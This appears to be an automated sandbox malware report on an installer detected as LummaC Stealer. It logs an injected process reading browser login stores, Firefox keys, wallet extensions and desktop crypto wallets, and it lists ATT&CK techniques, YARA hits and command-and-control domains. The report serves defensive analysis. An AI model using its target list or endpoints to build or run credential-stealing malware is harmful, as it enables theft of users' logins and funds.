Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2136115217.000000000313E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2136092641.0000000003136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2380, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2380, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	13 Virtualization/Sandbox Evasion	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	13 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Aquantia_Installer.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://frogs-severz.sbs/C	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/apixVebc	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/apii	0%	Avira URL Cloud	safe
fumblingactor.cyou	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/api	0%	Avira URL Cloud	safe
https://frogs-severz.sbs:443/apiAA3GM0RssN1u2sTrQHh4TeOMDePHoCR3hPAm7IHnVLLUAAAAAADoAAAAACAAAgAAAAVG	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/api#O	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/g	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/api#L	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
frogs-severz.sbs	172.67.155.47	true	false		high
fumblingactor.cyou	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://frogs-severz.sbs/api	true	Avira URL Cloud: safe	unknown
fumblingactor.cyou	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/C	aspnet_regiis.exe, 00000003.00000003.2133641948.0000000003124000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/apixVebc	aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/g	aspnet_regiis.exe, 00000003.00000002.2230294668.0000000003153000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/	aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://frogs-severz.sbs/apii	aspnet_regiis.exe, 00000003.00000003.2162393319.000000000314B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/api#L	aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	false		high
